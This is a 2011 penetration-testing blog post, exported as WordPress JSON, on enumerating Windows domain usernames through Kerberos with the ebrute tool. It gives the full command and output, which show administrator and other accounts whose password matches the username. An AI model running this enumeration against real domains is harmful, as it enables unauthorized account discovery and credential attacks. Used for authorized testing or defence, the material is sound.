{"id":315,"date":"2011-12-20T12:10:02","date_gmt":"2011-12-20T11:10:02","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=315"},"modified":"2011-12-20T12:10:02","modified_gmt":"2011-12-20T11:10:02","slug":"username-enumeration-the-new-way","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/12\/20\/username-enumeration-the-new-way\/","title":{"rendered":"Username enumeration, the new way"},"content":{"rendered":"

So we’ve all played with RID cycling and GetAcct.exe but lately I guess we’ve not been pulling this out of our bag. Protection against this is now normal so we need a new way to enumerate usernames against a given domain.
\nNew info on this website<\/a> is pointing towards a tool called ebrute<\/a> that will allow enumeration of kerberos without having to take a password guess. On a decent machine against a decent server you’ll hopefully achive 1,000,000 guesses per minute. Each guess is sent as a single UDP packet that has been stripped down to be as small in size as possible. Download the tool and make sure you have .Net version 2<\/a> or greater installed.
\nThen it’s just a simple case of running the tool against the domain:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<\/div><\/td>
C:\\ebrute><\/span>ebrute.exe -r<\/span> kerbenum -P<\/span> users.txt -h<\/span> 192.168.100.1 -e<\/span> example.com -t<\/span> 32<\/span>
\nebrute v0.76 - Edward Torkington
\nLoading passes...
\nParsing passes...
\nUsername not specified (<\/span>normal behavior for<\/span> some plugins - lets do<\/span> joey checks)<\/span>
\nAdded:    20<\/span>,973<\/span> user(<\/span>s)<\/span>, 0<\/span> password(<\/span>s)<\/span>, 1<\/span> host(<\/span>s)<\/span>,  + joeycheck 20<\/span>,973<\/span> tasks over 32<\/span> thread\/<\/span>s.
\nStarting: 20<\/span>\/<\/span>12<\/span>\/<\/span>2011<\/span> 11<\/span>:07:04
\n[<\/span>9<\/span>]<\/span>  HOST: '192.168.100.1'<\/span> |<\/span> USER: 'administrator'<\/span> |<\/span> PASS: 'administrator'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Success'<\/span> [<\/span>]<\/span>
\n[<\/span>21<\/span>]<\/span>  HOST: '192.168.100.1'<\/span> |<\/span> USER: 'guest'<\/span> |<\/span> PASS: 'guest'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Disabled'<\/span> [<\/span>]<\/span>
\n[<\/span>28<\/span>]<\/span>  HOST: '192.168.100.1'<\/span> |<\/span> USER: 'Myuser10'<\/span> |<\/span> PASS: 'Myuser10'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Success'<\/span> [<\/span>]<\/span>
\n[<\/span>30<\/span>]<\/span>  HOST: '192.168.100.1'<\/span> |<\/span> USER: 'MyUser100'<\/span> |<\/span> PASS: 'MyUser100'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Success'<\/span> [<\/span>]<\/span>
\n[<\/span>13<\/span>]<\/span>  HOST: '192.168.100.1'<\/span> |<\/span> USER: 'myuser34'<\/span> |<\/span> PASS: 'myuser34'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Success'<\/span> [<\/span>]<\/span>
\n[<\/span>5<\/span>]<\/span>  HOST: '192.168.100.1'<\/span> |<\/span> USER: '0,173648178'<\/span> |<\/span> PASS: '0,173648178'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Unknown'<\/span> [<\/span>Error, possibly reduce threds (<\/span>Attempt 1<\/span>\/<\/span>5<\/span>)<\/span>]<\/span>
\nComplete: 20<\/span>\/<\/span>12<\/span>\/<\/span>2011<\/span> 11<\/span>:07:12<\/span>
\nStats:    00:00:07    (<\/span>~169<\/span>,550<\/span> tasks\/<\/span>minute)<\/span> (<\/span>Performed 20<\/span>,973<\/span> \/<\/span> 20<\/span>,973<\/span> tasks)<\/span>
\nSummary of Authentication Successes:
\nHOST: '192.168.100.1'<\/span> |<\/span> USER: 'administrator'<\/span> |<\/span> PASS: 'administrator'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Success'<\/span>
\nHOST: '192.168.100.1'<\/span> |<\/span> USER: 'guest'<\/span> |<\/span> PASS: 'guest'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Disabled'<\/span>
\nHOST: '192.168.100.1'<\/span> |<\/span> USER: 'Myuser10'<\/span> |<\/span> PASS: 'Myuser10'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Success'<\/span>
\nHOST: '192.168.100.1'<\/span> |<\/span> USER: 'MyUser100'<\/span> |<\/span> PASS: 'MyUser100'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Success'<\/span>
\nHOST: '192.168.100.1'<\/span> |<\/span> USER: 'myuser34'<\/span> |<\/span> PASS: 'myuser34'<\/span> |<\/span> EXTRA: 'example.com'<\/span> |<\/span> Return code: 'Success'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Simples<\/p>\n","protected":false},"excerpt":{"rendered":"

So we’ve all played with RID cycling and GetAcct.exe but lately I guess we’ve not been pulling this out of our bag. Protection against this is now normal so we need a new way to enumerate usernames against a given domain. New info on this website is pointing towards a tool called ebrute that will […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[116,118,119,117,121,120,113],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/315"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=315"}],"version-history":[{"count":2,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/315\/revisions"}],"predecessor-version":[{"id":317,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/315\/revisions\/317"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}